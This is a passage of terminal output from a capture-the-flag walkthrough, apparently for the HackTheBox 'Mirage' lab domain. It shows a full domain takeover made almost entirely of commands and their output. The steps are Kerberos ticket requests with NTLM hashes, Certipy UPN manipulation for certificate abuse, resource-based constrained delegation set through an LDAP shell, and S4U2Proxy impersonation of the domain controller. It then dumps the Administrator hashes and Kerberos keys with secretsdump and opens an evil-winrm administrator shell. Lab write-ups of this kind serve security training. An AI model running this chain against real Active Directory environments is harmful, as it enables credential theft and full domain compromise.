[*] Wrote certificate and private key to 'dc.pfx'
we bring mark back as he was
➜ Mirage impacket-getTGT 'mirage.htb/mirage-service$' -hashes 'aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in mirage-service$.ccache
➜ Mirage sudo chmod 600 mirage-service\$.ccache
➜ Mirage export KRB5CCNAME=mirage-service\$.ccache
➜ Mirage klist
Credentials cache: FILE:mirage-service$.ccache
Principal: mirage-service$@MIRAGE.HTB
Issued Expires Principal
Jul 20 20:30:00 2025 Jul 21 06:30:00 2025 krbtgt/MIRAGE.HTB@MIRAGE.HTB
➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'mark.bbond':
userPrincipalName : mark.bbond@mirage.htb
[*] Successfully updated 'mark.bbond'
➜ Mirage certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.28.136 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'DC01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.28.136:636'
[*] Authenticated to '10.129.28.136' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# whoami
u:MIRAGE\DC01$
# set_rbcd dc01$ mirage-service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
mirage-service$ can now impersonate users on dc01$ via S4U2Proxy
➜ Mirage impacket-getST mirage.htb/mirage-service\$ -k -no-pass -spn 'cifs/DC01.mirage.htb' -impersonate 'DC01$' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
➜ Mirage impacket-secretsdump 'dc01$@dc01.mirage.htb' -k -no-pass -dc-ip 10.129.28.136 -just-dc-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619➜ Mirage impacket-getTGT 'mirage.htb/administrator' -hashes 'aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
➜ Mirage sudo chmod 600 administrator.ccache
➜ Mirage export KRB5CCNAME=administrator.ccache
➜ Mirage klist -c administrator.ccache
Credentials cache: FILE:administrator.ccache
Principal: administrator@MIRAGE.HTB
Issued Expires Principal
Jul 20 21:40:18 2025 Jul 21 07:40:18 2025 krbtgt/MIRAGE.HTB@MIRAGE.HTB
➜ Mirage evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>